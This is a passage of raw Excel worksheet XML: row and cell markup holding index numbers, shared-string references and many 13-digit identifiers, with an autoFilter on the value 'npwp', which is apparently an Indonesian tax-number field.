        <v>14214</v>
      </c>
      <c r="C7874">
        <v>1</v>
      </c>
    </row>
    <row r="7875" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7875">
        <v>6091</v>
      </c>
      <c r="B7875" t="s">
        <v>14214</v>
      </c>
      <c r="C7875">
        <v>1</v>
      </c>
    </row>
    <row r="7876" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7876">
        <v>6092</v>
      </c>
      <c r="B7876" t="s">
        <v>14214</v>
      </c>
      <c r="C7876">
        <v>1</v>
      </c>
    </row>
    <row r="7877" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7877">
        <v>6093</v>
      </c>
      <c r="B7877" t="s">
        <v>14214</v>
      </c>
      <c r="C7877">
        <v>1</v>
      </c>
    </row>
    <row r="7878" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7878">
        <v>6094</v>
      </c>
      <c r="B7878" t="s">
        <v>14214</v>
      </c>
      <c r="C7878">
        <v>1</v>
      </c>
    </row>
    <row r="7879" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7879">
        <v>6095</v>
      </c>
      <c r="B7879" t="s">
        <v>14214</v>
      </c>
      <c r="C7879">
        <v>1</v>
      </c>
    </row>
    <row r="7880" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7880">
        <v>6096</v>
      </c>
      <c r="B7880" t="s">
        <v>14214</v>
      </c>
      <c r="C7880">
        <v>1</v>
      </c>
    </row>
    <row r="7881" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7881">
        <v>6097</v>
      </c>
      <c r="B7881" t="s">
        <v>14214</v>
      </c>
      <c r="C7881">
        <v>1</v>
      </c>
    </row>
    <row r="7882" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7882">
        <v>6098</v>
      </c>
      <c r="B7882" t="s">
        <v>14214</v>
      </c>
      <c r="C7882">
        <v>1</v>
      </c>
    </row>
    <row r="7883" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7883">
        <v>6099</v>
      </c>
      <c r="B7883" t="s">
        <v>14214</v>
      </c>
      <c r="C7883">
        <v>1</v>
      </c>
    </row>
    <row r="7884" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7884">
        <v>6100</v>
      </c>
      <c r="B7884" t="s">
        <v>14214</v>
      </c>
      <c r="C7884">
        <v>1</v>
      </c>
    </row>
    <row r="7885" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7885">
        <v>6101</v>
      </c>
      <c r="B7885" t="s">
        <v>14214</v>
      </c>
      <c r="C7885">
        <v>1</v>
      </c>
    </row>
    <row r="7886" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7886">
        <v>6102</v>
      </c>
      <c r="B7886" t="s">
        <v>14214</v>
      </c>
      <c r="C7886">
        <v>1</v>
      </c>
    </row>
    <row r="7887" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7887">
        <v>6103</v>
      </c>
      <c r="B7887" t="s">
        <v>14214</v>
      </c>
      <c r="C7887">
        <v>1</v>
      </c>
    </row>
    <row r="7888" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7888">
        <v>6104</v>
      </c>
      <c r="B7888" t="s">
        <v>14214</v>
      </c>
      <c r="C7888">
        <v>1</v>
      </c>
    </row>
    <row r="7889" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7889">
        <v>6105</v>
      </c>
      <c r="B7889" t="s">
        <v>14214</v>
      </c>
      <c r="C7889">
        <v>1</v>
      </c>
    </row>
    <row r="7890" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7890">
        <v>6106</v>
      </c>
      <c r="B7890" t="s">
        <v>14214</v>
      </c>
      <c r="C7890">
        <v>1</v>
      </c>
    </row>
    <row r="7891" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7891">
        <v>6107</v>
      </c>
      <c r="B7891" t="s">
        <v>14214</v>
      </c>
      <c r="C7891">
        <v>1</v>
      </c>
    </row>
    <row r="7892" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7892">
        <v>6108</v>
      </c>
      <c r="B7892" t="s">
        <v>14214</v>
      </c>
      <c r="C7892">
        <v>1</v>
      </c>
    </row>
    <row r="7893" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7893">
        <v>6109</v>
      </c>
      <c r="B7893" t="s">
        <v>14214</v>
      </c>
      <c r="C7893">
        <v>1</v>
      </c>
    </row>
    <row r="7894" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7894">
        <v>6110</v>
      </c>
      <c r="B7894" t="s">
        <v>14214</v>
      </c>
      <c r="C7894">
        <v>1</v>
      </c>
    </row>
    <row r="7895" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7895">
        <v>6111</v>
      </c>
      <c r="B7895" t="s">
        <v>14214</v>
      </c>
      <c r="C7895">
        <v>1</v>
      </c>
    </row>
    <row r="7896" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7896">
        <v>6112</v>
      </c>
      <c r="B7896" t="s">
        <v>14214</v>
      </c>
      <c r="C7896">
        <v>1</v>
      </c>
    </row>
    <row r="7897" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7897">
        <v>6113</v>
      </c>
      <c r="B7897" t="s">
        <v>14214</v>
      </c>
      <c r="C7897">
        <v>1</v>
      </c>
    </row>
    <row r="7898" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7898">
        <v>6114</v>
      </c>
      <c r="B7898" t="s">
        <v>14214</v>
      </c>
      <c r="C7898">
        <v>1</v>
      </c>
    </row>
    <row r="7899" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7899">
        <v>6115</v>
      </c>
      <c r="B7899" t="s">
        <v>14214</v>
      </c>
      <c r="C7899">
        <v>1</v>
      </c>
    </row>
    <row r="7900" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7900">
        <v>6116</v>
      </c>
      <c r="B7900" t="s">
        <v>14214</v>
      </c>
      <c r="C7900">
        <v>1</v>
      </c>
    </row>
    <row r="7901" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7901">
        <v>6117</v>
      </c>
      <c r="B7901" t="s">
        <v>14214</v>
      </c>
      <c r="C7901">
        <v>1</v>
      </c>
    </row>
    <row r="7902" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7902">
        <v>6118</v>
      </c>
      <c r="B7902" t="s">
        <v>14214</v>
      </c>
      <c r="C7902">
        <v>1</v>
      </c>
    </row>
    <row r="7903" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7903">
        <v>6119</v>
      </c>
      <c r="B7903" t="s">
        <v>14214</v>
      </c>
      <c r="C7903">
        <v>1</v>
      </c>
    </row>
    <row r="7904" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7904">
        <v>6120</v>
      </c>
      <c r="B7904" t="s">
        <v>14214</v>
      </c>
      <c r="C7904">
        <v>1</v>
      </c>
    </row>
    <row r="7905" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7905">
        <v>6121</v>
      </c>
      <c r="B7905" t="s">
        <v>14214</v>
      </c>
      <c r="C7905">
        <v>1</v>
      </c>
    </row>
    <row r="7906" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7906">
        <v>6122</v>
      </c>
      <c r="B7906" t="s">
        <v>14214</v>
      </c>
      <c r="C7906">
        <v>1</v>
      </c>
    </row>
    <row r="7907" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7907">
        <v>6123</v>
      </c>
      <c r="B7907" t="s">
        <v>14214</v>
      </c>
      <c r="C7907">
        <v>1</v>
      </c>
    </row>
    <row r="7908" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7908">
        <v>6124</v>
      </c>
      <c r="B7908" t="s">
        <v>14214</v>
      </c>
      <c r="C7908">
        <v>1</v>
      </c>
    </row>
    <row r="7909" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7909">
        <v>6125</v>
      </c>
      <c r="B7909" t="s">
        <v>14214</v>
      </c>
      <c r="C7909">
        <v>1</v>
      </c>
    </row>
    <row r="7910" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7910">
        <v>6126</v>
      </c>
      <c r="B7910" t="s">
        <v>14214</v>
      </c>
      <c r="C7910">
        <v>1</v>
      </c>
    </row>
    <row r="7911" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7911">
        <v>6127</v>
      </c>
      <c r="B7911" t="s">
        <v>14214</v>
      </c>
      <c r="C7911">
        <v>1</v>
      </c>
    </row>
    <row r="7912" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7912">
        <v>6128</v>
      </c>
      <c r="B7912" t="s">
        <v>14214</v>
      </c>
      <c r="C7912">
        <v>1</v>
      </c>
    </row>
    <row r="7913" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7913">
        <v>6129</v>
      </c>
      <c r="B7913" t="s">
        <v>14214</v>
      </c>
      <c r="C7913">
        <v>1</v>
      </c>
    </row>
    <row r="7914" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7914">
        <v>6130</v>
      </c>
      <c r="B7914" t="s">
        <v>14214</v>
      </c>
      <c r="C7914">
        <v>1</v>
      </c>
    </row>
    <row r="7915" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7915">
        <v>6131</v>
      </c>
      <c r="B7915" t="s">
        <v>14214</v>
      </c>
      <c r="C7915">
        <v>1</v>
      </c>
    </row>
    <row r="7916" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7916">
        <v>6132</v>
      </c>
      <c r="B7916" t="s">
        <v>14214</v>
      </c>
      <c r="C7916">
        <v>1279000550932</v>
      </c>
    </row>
    <row r="7917" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7917">
        <v>6133</v>
      </c>
      <c r="B7917" t="s">
        <v>14214</v>
      </c>
      <c r="C7917">
        <v>220000240521</v>
      </c>
    </row>
    <row r="7918" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7918">
        <v>6134</v>
      </c>
      <c r="B7918" t="s">
        <v>14214</v>
      </c>
      <c r="C7918">
        <v>8120118031722</v>
      </c>
    </row>
    <row r="7919" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7919">
        <v>6135</v>
      </c>
      <c r="B7919" t="s">
        <v>14214</v>
      </c>
      <c r="C7919">
        <v>1282000602468</v>
      </c>
    </row>
    <row r="7920" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7920">
        <v>6136</v>
      </c>
      <c r="B7920" t="s">
        <v>14214</v>
      </c>
      <c r="C7920">
        <v>9120006272829</v>
      </c>
    </row>
    <row r="7921" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7921">
        <v>6137</v>
      </c>
      <c r="B7921" t="s">
        <v>14214</v>
      </c>
      <c r="C7921">
        <v>9120103222223</v>
      </c>
    </row>
    <row r="7922" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7922">
        <v>6138</v>
      </c>
      <c r="B7922" t="s">
        <v>14214</v>
      </c>
      <c r="C7922">
        <v>9120204731886</v>
      </c>
    </row>
    <row r="7923" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7923">
        <v>6139</v>
      </c>
      <c r="B7923" t="s">
        <v>14214</v>
      </c>
      <c r="C7923">
        <v>9120200860095</v>
      </c>
    </row>
    <row r="7924" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7924">
        <v>6140</v>
      </c>
      <c r="B7924" t="s">
        <v>14214</v>
      </c>
      <c r="C7924">
        <v>220008580147</v>
      </c>
    </row>
    <row r="7925" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7925">
        <v>6137</v>
      </c>
      <c r="B7925" t="s">
        <v>14203</v>
      </c>
      <c r="C7925" t="s">
        <v>16206</v>
      </c>
    </row>
    <row r="7926" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7926">
        <v>6136</v>
      </c>
      <c r="B7926" t="s">
        <v>14203</v>
      </c>
      <c r="C7926" t="s">
        <v>16207</v>
      </c>
    </row>
    <row r="7927" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7927">
        <v>1977</v>
      </c>
      <c r="B7927" t="s">
        <v>14214</v>
      </c>
      <c r="C7927">
        <v>9120307182846</v>
      </c>
    </row>
    <row r="7928" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7928">
        <v>1977</v>
      </c>
      <c r="B7928" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="7929" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7929">
        <v>6141</v>
      </c>
      <c r="B7929" t="s">
        <v>14214</v>
      </c>
      <c r="C7929">
        <v>1272000301474</v>
      </c>
    </row>
    <row r="7930" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7930">
        <v>5943</v>
      </c>
      <c r="B7930" t="s">
        <v>14203</v>
      </c>
      <c r="C7930" t="s">
        <v>16208</v>
      </c>
    </row>
    <row r="7931" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7931">
        <v>6142</v>
      </c>
      <c r="B7931" t="s">
        <v>14214</v>
      </c>
      <c r="C7931">
        <v>8120315190255</v>
      </c>
    </row>
    <row r="7932" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7932">
        <v>6143</v>
      </c>
      <c r="B7932" t="s">
        <v>14214</v>
      </c>
      <c r="C7932">
        <v>259010012546</v>
      </c>
    </row>
    <row r="7933" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7933">
        <v>6144</v>
      </c>
      <c r="B7933" t="s">
        <v>14214</v>
      </c>
      <c r="C7933">
        <v>234011072513</v>
      </c>
    </row>
    <row r="7934" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7934">
        <v>6145</v>
      </c>
      <c r="B7934" t="s">
        <v>14214</v>
      </c>
      <c r="C7934">
        <v>8120315190255</v>
      </c>
    </row>
    <row r="7935" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7935">
        <v>6146</v>
      </c>
      <c r="B7935" t="s">
        <v>14214</v>
      </c>
      <c r="C7935">
        <v>9120201552579</v>
      </c>
    </row>
    <row r="7936" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7936">
        <v>6147</v>
      </c>
      <c r="B7936" t="s">
        <v>14214</v>
      </c>
      <c r="C7936">
        <v>220304292574</v>
      </c>
    </row>
    <row r="7937" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7937">
        <v>6148</v>
      </c>
      <c r="B7937" t="s">
        <v>14214</v>
      </c>
      <c r="C7937">
        <v>1243000351567</v>
      </c>
    </row>
    <row r="7938" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7938">
        <v>5820</v>
      </c>
      <c r="B7938" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="7939" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7939">
        <v>5612</v>
      </c>
      <c r="B7939" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="7940" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7940">
        <v>6149</v>
      </c>
      <c r="B7940" t="s">
        <v>14214</v>
      </c>
      <c r="C7940">
        <v>282000922384</v>
      </c>
    </row>
    <row r="7941" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7941">
        <v>6150</v>
      </c>
      <c r="B7941" t="s">
        <v>14214</v>
      </c>
      <c r="C7941">
        <v>9120206240679</v>
      </c>
    </row>
    <row r="7942" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7942">
        <v>6151</v>
      </c>
      <c r="B7942" t="s">
        <v>14214</v>
      </c>
      <c r="C7942">
        <v>9120206240679</v>
      </c>
    </row>
    <row r="7943" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7943">
        <v>6152</v>
      </c>
      <c r="B7943" t="s">
        <v>14214</v>
      </c>
      <c r="C7943">
        <v>129100700243</v>
      </c>
    </row>
    <row r="7944" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7944">
        <v>6153</v>
      </c>
      <c r="B7944" t="s">
        <v>14214</v>
      </c>
      <c r="C7944">
        <v>9120001512389</v>
      </c>
    </row>
    <row r="7945" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7945">
        <v>6154</v>
      </c>
      <c r="B7945" t="s">
        <v>14214</v>
      </c>
      <c r="C7945">
        <v>1232002400977</v>
      </c>
    </row>
    <row r="7946" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7946">
        <v>6155</v>
      </c>
      <c r="B7946" t="s">
        <v>14214</v>
      </c>
      <c r="C7946">
        <v>220002592278</v>
      </c>
    </row>
    <row r="7947" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7947">
        <v>6156</v>
      </c>
      <c r="B7947" t="s">
        <v>14214</v>
      </c>
      <c r="C7947">
        <v>9120316080573</v>
      </c>
    </row>
    <row r="7948" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7948">
        <v>6157</v>
      </c>
      <c r="B7948" t="s">
        <v>14214</v>
      </c>
      <c r="C7948">
        <v>220304292574</v>
      </c>
    </row>
    <row r="7949" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7949">
        <v>6153</v>
      </c>
      <c r="B7949" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="7950" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7950">
        <v>6134</v>
      </c>
      <c r="B7950" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="7951" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7951">
        <v>6154</v>
      </c>
      <c r="B7951" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="7952" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7952">
        <v>995</v>
      </c>
      <c r="B7952" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="7953" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7953">
        <v>995</v>
      </c>
      <c r="B7953" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="7954" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7954">
        <v>5948</v>
      </c>
      <c r="B7954" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="7955" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7955">
        <v>6158</v>
      </c>
      <c r="B7955" t="s">
        <v>14214</v>
      </c>
      <c r="C7955">
        <v>220200291623</v>
      </c>
    </row>
    <row r="7956" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7956">
        <v>6159</v>
      </c>
      <c r="B7956" t="s">
        <v>14214</v>
      </c>
      <c r="C7956">
        <v>9120100470789</v>
      </c>
    </row>
    <row r="7957" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7957">
        <v>6160</v>
      </c>
      <c r="B7957" t="s">
        <v>14214</v>
      </c>
      <c r="C7957">
        <v>220106290256</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:C7957" xr:uid="{812E86EB-C810-C245-8018-DC8F9805D135}">
    <filterColumn colId="1">
      <filters>
        <filter val="npwp"/>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6FEE2-CBCF-654B-8A89-B0ACF40CAFA2}">
  <dimension ref="A1:E5229"/>
  <sheetViews>
    <sheetView topLeftCell="A2699" workbookViewId="0">
      <selection activeCell="B28" sqref="B28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <sheetData>
    <row r="1" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>14214</v>
      </c>
      <c r="D1" t="s">
        <v>0</v>
      </c>
      <c r="E1" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="2" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A2">
        <v>10</v>
      </c>
      <c r="B2">
        <v>8120115082332</v>
      </c>
      <c r="D2">
        <v>1</v>
      </c>
      <c r="E2" t="s">
        <v>14204</v>
      </c>
    </row>
    <row r="3" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A3">
        <v>15</v>
      </c>
      <c r="B3">
        <v>9120306970097</v>
      </c>
      <c r="D3">
        <v>2</v>
      </c>
      <c r="E3" t="s">
        <v>14205</v>
      </c>
    </row>
    <row r="4" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>5022</v>
      </c>
      <c r="B4">
        <v>8120003852614</v>
      </c>
      <c r="D4">
        <v>3</v>
      </c>
      <c r="E4" t="s">
        <v>14206</v>
      </c>
    </row>
    <row r="5" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>18</v>
      </c>
      <c r="B5">
        <v>9120005531374</v>
      </c>
      <c r="D5">
        <v>4</v>
      </c>
      <c r="E5" t="s">
        <v>14207</v>
      </c>
    </row>
    <row r="6" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>19</v>
      </c>
      <c r="B6">
        <v>8120319081767</v>
      </c>
      <c r="D6">
        <v>5</v>
      </c>
      <c r="E6" t="s">
        <v>14208</v>
      </c>
    </row>
    <row r="7" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>21</v>
      </c>
      <c r="B7">
        <v>8120119291599</v>
      </c>
      <c r="D7">
        <v>6</v>
      </c>
      <c r="E7" t="s">
        <v>14209</v>
      </c>
    </row>
    <row r="8" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>22</v>
      </c>
      <c r="B8">
        <v>8120118001752</v>
      </c>
      <c r="D8">
        <v>7</v>
      </c>
      <c r="E8" t="s">
        <v>14210</v>
      </c>
    </row>
    <row r="9" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>26</v>
      </c>
      <c r="B9">
        <v>9120302152812</v>
      </c>
      <c r="D9">
        <v>8</v>
      </c>
      <c r="E9" t="s">
        <v>14211</v>
      </c>
    </row>
    <row r="10" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A10">
        <v>28</v>
      </c>
      <c r="B10">
        <v>8120101900065</v>
      </c>
      <c r="D10">
        <v>9</v>
      </c>
      <c r="E10" t="s">
        <v>14212</v>
      </c>
    </row>
    <row r="11" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A11">
        <v>32</v>
      </c>
      <c r="B11">
        <v>8120102821507</v>
      </c>
      <c r="D11">
        <v>10</v>
      </c>
      <c r="E11" t="s">
        <v>14213</v>
      </c>
    </row>
    <row r="12" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A12">
        <v>33</v>
      </c>
      <c r="B12">
        <v>8120015222426</v>
      </c>
      <c r="D12">
        <v>11</v>
      </c>
      <c r="E12" t="s">
        <v>14215</v>
      </c>
    </row>
    <row r="13" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A13">
        <v>35</v>
      </c>
      <c r="B13">
        <v>8120002912691</v>
      </c>
      <c r="D13">
        <v>12</v>
      </c>
      <c r="E13" t="s">
        <v>14216</v>
      </c>
    </row>
    <row r="14" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A14">
        <v>42</v>
      </c>
      <c r="B14">
        <v>8120105743719</v>
      </c>
      <c r="D14">
        <v>13</v>
      </c>
      <c r="E14" t="s">
        <v>14217</v>
      </c>
    </row>
    <row r="15" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A15">
        <v>48</v>
      </c>
      <c r="B15">
        <v>8120117271615</v>
      </c>
      <c r="D15">
        <v>14</v>
      </c>
      <c r="E15" t="s">
        <v>14218</v>
      </c>
    </row>
    <row r="16" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A16">
        <v>49</v>
      </c>
      <c r="B16">
        <v>9120204471615</v>
      </c>
      <c r="D16">
        <v>15</v>
      </c>
      <c r="E16" t="s">
        <v>14219</v>
      </c>
    </row>
    <row r="17" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A17">
        <v>50</v>
      </c>
      <c r="B17">
        <v>8120108840033</v>
      </c>
      <c r="D17">
        <v>16</v>
      </c>
      <c r="E17" t="s">
        <v>14220</v>
      </c>
    </row>
    <row r="18" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A18">
        <v>51</v>
      </c>
      <c r="B18">
        <v>8120207860013</v>
      </c>
      <c r="D18">
        <v>5022</v>
      </c>
      <c r="E18" t="s">
        <v>14221</v>
      </c>
    </row>
    <row r="19" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A19">
        <v>52</v>
      </c>
      <c r="B19">
        <v>8120004870536</v>
      </c>
      <c r="D19">
        <v>18</v>
      </c>
      <c r="E19" t="s">
        <v>14222</v>
      </c>
    </row>
    <row r="20" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A20">
        <v>55</v>
      </c>
      <c r="B20">
        <v>8120006981624</v>
      </c>
      <c r="D20">
        <v>19</v>
      </c>
      <c r="E20" t="s">
        <v>14223</v>
      </c>
    </row>
    <row r="21" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A21">
        <v>56</v>
      </c>
      <c r="B21">
        <v>8120202820081</v>
      </c>
      <c r="D21">
        <v>20</v>
      </c>
      <c r="E21" t="s">
        <v>14224</v>
      </c>
    </row>
    <row r="22" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A22">
        <v>57</v>
      </c>
      <c r="B22">
        <v>8120301830418</v>
      </c>
      <c r="D22">
        <v>21</v>
      </c>
      <c r="E22" t="s">
        <v>14225</v>
      </c>
    </row>
    <row r="23" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A23">
        <v>61</v>
      </c>
      <c r="B23">
        <v>8120119123905</v>
      </c>
      <c r="D23">
        <v>22</v>
      </c>
      <c r="E23" t="s">
        <v>14226</v>
      </c>
    </row>
    <row r="24" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A24">
        <v>67</v>
      </c>
      <c r="B24">
        <v>8120009850712</v>
      </c>
      <c r="D24">
        <v>23</v>
      </c>
      <c r="E24" t="s">
        <v>14227</v>
      </c>
    </row>
    <row r="25" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A25">
        <v>69</v>
      </c>
      <c r="B25">
        <v>9120002433109</v>
      </c>
      <c r="D25">
        <v>24</v>
      </c>
      <c r="E25" t="s">
        <v>14228</v>
      </c>
    </row>
    <row r="26" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A26">
        <v>70</v>
      </c>
      <c r="B26">
        <v>8120002722675</v>
      </c>
      <c r="D26">
        <v>25</v>
      </c>
      <c r="E26" t="s">
        <v>14229</v>
      </c>
    </row>
    <row r="27" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A27">
        <v>79</v>
      </c>
      <c r="B27">
        <v>9120009142286</v>
      </c>
      <c r="D27">
        <v>26</v>
      </c>
      <c r="E27" t="s">
        <v>14230</v>
      </c>
    </row>
    <row r="28" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A28">
        <v>80</v>
      </c>
      <c r="B28">
        <v>8120101970649</v>
      </c>
      <c r="D28">
        <v>27</v>
      </c>
      <c r="E28" t="s">
        <v>14231</v>
      </c>
    </row>
    <row r="29" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A29">
        <v>81</v>
      </c>
      <c r="B29">
        <v>8120009950544</v>
      </c>
      <c r="D29">
        <v>28</v>
      </c>
      <c r="E29" t="s">
        <v>14232</v>
      </c>
    </row>
    <row r="30" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A30">
        <v>82</v>
      </c>
      <c r="B30">
        <v>8120204982805</v>
      </c>
      <c r="D30">
        <v>29</v>
      </c>
      <c r="E30" t="s">
        <v>14233</v>
      </c>
    </row>
    <row r="31" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A31">
        <v>2722</v>
      </c>
      <c r="B31">
        <v>8120000711862</v>
      </c>
      <c r="D31">
        <v>30</v>
      </c>
      <c r="E31" t="s">
        <v>14234</v>
      </c>
    </row>
    <row r="32" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A32">
        <v>87</v>
      </c>
      <c r="B32">
        <v>9120006180941</v>
      </c>
      <c r="D32">
        <v>31</v>
      </c>
      <c r="E32" t="s">
        <v>14235</v>
      </c>
    </row>
    <row r="33" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A33">
        <v>88</v>
      </c>
      <c r="B33">
        <v>9120107162355</v>
      </c>
      <c r="D33">
        <v>32</v>
      </c>
      <c r="E33" t="s">
        <v>14236</v>
      </c>
    </row>
    <row r="34" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A34">
        <v>92</v>
      </c>
      <c r="B34">
        <v>8120212221176</v>
      </c>
      <c r="D34">
        <v>33</v>
      </c>
      <c r="E34" t="s">
        <v>14237</v>
      </c>
    </row>
    <row r="35" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A35">
        <v>94</v>
      </c>
      <c r="B35">
        <v>8120002711899</v>
      </c>
      <c r="D35">
        <v>34</v>
      </c>
      <c r="E35" t="s">
        <v>14238</v>
      </c>
    </row>
    <row r="36" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A36">
        <v>99</v>
      </c>
      <c r="B36">
        <v>9120406822792</v>
      </c>
      <c r="D36">
        <v>35</v>
      </c>
